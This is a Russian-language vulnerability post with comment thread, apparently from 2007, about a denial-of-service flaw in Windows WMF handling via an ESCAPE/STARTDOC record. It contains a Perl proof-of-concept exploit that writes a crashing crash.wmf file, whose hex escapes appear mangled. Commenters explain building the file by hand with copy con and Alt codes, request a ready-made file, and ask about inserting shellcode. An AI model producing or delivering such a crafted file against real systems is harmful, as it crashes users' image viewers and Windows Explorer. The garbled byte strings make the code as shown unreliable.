22 Февраля, 2007

Отказ в обслуживаний в WMF

azm

Удаленный пользователь может с помощью специально сформированного изображения вызвать отказ в обслуживании приложения, использующего уязвимую библиотеку.
Это происходит при отображении ESCAPE-метазаписи (фунция STARTDOC)так как, не инициализированый адреса импорта функции SeekPrinter из winspool.drv.
Уязвимыми оказываются не только приложения успользующие напрямую GDI, но и приложения использующие функции shimgvw.dll как "высокоуровневой обёртки" GDI, такие как "Программа просмотра изображений и факсов" и Windows Explorer.
Способов устранения уязвимости не существует в настоящее время.

Эксплоит:

#!/usr/bin/perl

print "
WMF PoC denial of service exploit by AzM";
print "

generating crash.wmf...";
open(WMF, ">./crash.wmf") or die "cannot create wmf file
";
print WMF "x01x00x09x00x00x03x22x00x00x00x01x00x84x43x00x00";
print WMF "x00x00x10x00x00x00x26x06x0Ax00x16x00x90x90x90x90";
print WMF "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90";
print WMF "x90x90x90x90x90x90x90x90x90x90x90x90x90x00x03x00";
print WMF "x00x00x00x00";
close(WMF);
print "Ok
";
или введите имя

CAPTCHA
1
24 Февраля, 2007
RE: Отказ в обслуживаний в WMF
У меня DOS'а не происходит
0 |
1
25 Февраля, 2007
RE: Отказ в обслуживаний в WMF
Значит ты делаешь что то не так... Этот код сам не является эксплоитом. Эксплоитом является файл WMF полученный на выходе. Если нет перла, можно воспользоватся любым HEX редактором для создания файла. Если нет и HEX редактора под рукой, всегда есть лист бумаги, карандаш и copy con exploit.wmf
0 |
1
25 Февраля, 2007
RE: RE: Отказ в обслуживаний в WMF
а по подробней можна, плиз
0 |
1
25 Февраля, 2007
RE: RE: RE: Отказ в обслуживаний в WMF
Конечно можно. Если под рукой есть калькулятор который переводит из HEX в DEC то, берем каждый байт эксплоита, и переводим сначала в DEC. то есть, например: \x01\x00\x09\x00\x00\x03\x22\, это будет 001, 000,009, 000,000, 003, 034 И т.д. Потом открываем cmd и набираем: copy con имя_файла.wmf. Потом при помощи вспомогательной цифровой клавиатуры (там где нам лок), зажав кнопку alt набираем: alt-001, отпустили альт, alt-034 и т.д. После того как набрали весь файл, жмем CTLR-Z. Проблема лишь в том, что есть некоторые alt последовательности, которые нельзя набрать на этой клавиатуре. Поэтому сначала надо перенести весь код на ассемблер, исправить комбинации которые нельзя перенести, ассемблировать, открывать HEX редактором и переводить в DEC. Вообщем это тема отдельного разговора. Кому интересно стучитесь в аську 2000-9-4444
0 |
1
6 Марта, 2007
RE: RE: RE: RE: Отказ в обслуживаний в WMF
Если можно вышли плиз на мыло готовый WMF hacker-maker@yandex.ru
0 |
1
25 Февраля, 2007
RE: Отказ в обслуживаний в WMF
А не расскажете куда можно вставить свой shell-код ?
0 |
1
25 Февраля, 2007
RE: RE: Отказ в обслуживаний в WMF
Никуда. Это DOS атака, отказ в обслуживании, а не переполнение буфера.
0 |
1
26 Февраля, 2007
RE: RE: RE: Отказ в обслуживаний в WMF
Да ! Очень интересная уязвимость...А главное как просто эксплоит залепить ! AzM МОЛОДЕЦ !!! Найти такую уязвимость ! Супер !
0 |
1
23 Апреля, 2007
RE[4]: Отказ в обслуживаний в WMF
и как этот WMF использовать....
0 |